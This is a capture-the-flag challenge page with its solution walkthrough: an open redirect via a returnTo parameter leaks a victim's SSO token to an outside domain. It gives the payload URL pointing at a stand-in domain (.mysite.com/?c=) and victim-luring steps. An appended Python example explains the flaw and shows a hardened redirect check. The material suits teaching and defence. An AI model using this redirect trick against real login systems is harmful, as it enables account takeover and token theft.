Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.
Failure to abide by the rules will put you at risk of being restricted from using our free challenges.
Can you steal the SSO token?
Open URL Redirect
We've built a super secure login portal to access our diet plan and we'd love your help to make sure we've set it up correctly.
You can log in to ManageMyDiet with the following credentials:
We've added SSO support and we'd like to make sure it's all set up ok and you can't leak the token to other domains.
Completed the challenge?
You can browse the intended solution to this challenge below.
After logging in you will notice two cookies are set:
SSO is set for less time than
Delete the cookie sso and revisit https://www.bugbountytraining.com/challenges/loginchallenge and you'll notice it redirects back to
&sso= appended. Seems interesting, right?
So you've discovered that after the SSO token has expired, revisiting the login page will set it again. But how do we leak it?
ALWAYS test common keywords on register/login pages such as goto as they are more than likely going to do something. In this case, revisiting https://www.bugbountytraining.com/challenges/loginchallenge?returnTo=.mysite.com/?c= will result in the user's SSO token being leaked to your domain.
- Login using
- Delete SSO token (naturally expires after 1 hour)
- Send victim to https://www.bugbountytraining.com/challenges/loginchallenge?returnTo=.mysite.com/?c= and if they are logged in (userinfo set), it will leak their sso token to your website!
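
For the defending side, here is an added example (not part of the original walkthrough or the challenge's own code) of why a returnTo value like the one above escapes the site, and a stricter check that refuses it. It assumes the weak handler concatenates returnTo onto the site origin; the function names, ALLOWED_HOSTS and FALLBACK are hypothetical.

```python
from typing import Optional
from urllib.parse import urlencode, urlsplit

ORIGIN = "https://www.bugbountytraining.com"
ALLOWED_HOSTS = {"www.bugbountytraining.com"}  # assumption: only host that may receive the token
FALLBACK = ORIGIN + "/challenges/loginchallenge"  # assumption: safe landing page


def naive_redirect(return_to: str, sso: str) -> str:
    """Assumed weak handler: returnTo is glued straight onto the origin."""
    return f"{ORIGIN}{return_to}&sso={sso}"


def resolve_return_to(return_to: str) -> Optional[str]:
    """Return an absolute same-site URL for returnTo, or None to refuse it."""
    # Accept site-relative paths only. Without the leading "/", the value
    # extends the hostname itself (".mysite.com" -> <origin>.mysite.com).
    if not return_to.startswith("/") or return_to.startswith("//"):
        return None
    # Browsers treat "\" as "/" and strip tab/CR/LF, so "/\host" or
    # "/<tab>/host" would still become a scheme-relative URL.
    if any(ch in return_to for ch in "\\\t\r\n"):
        return None
    target = urlsplit(ORIGIN + return_to)
    # Defence in depth: exact host match, never a prefix or substring test.
    if target.scheme != "https" or target.hostname not in ALLOWED_HOSTS:
        return None
    # Drop any fragment so the token is appended to the query string.
    return target._replace(fragment="").geturl()


def safe_redirect(return_to: str, sso: str) -> str:
    """Attach the token only when the destination is verified same-site."""
    target = resolve_return_to(return_to)
    if target is None:
        return FALLBACK  # refused: redirect without any token
    sep = "&" if urlsplit(target).query else "?"
    return target + sep + urlencode({"sso": sso})


if __name__ == "__main__":
    payload = ".mysite.com/?c="  # returnTo value from the walkthrough
    print("naive   :", naive_redirect(payload, "TOKEN"))
    print("hardened:", safe_redirect(payload, "TOKEN"))
    print("hardened:", safe_redirect("/challenges/loginchallenge/plan", "TOKEN"))
```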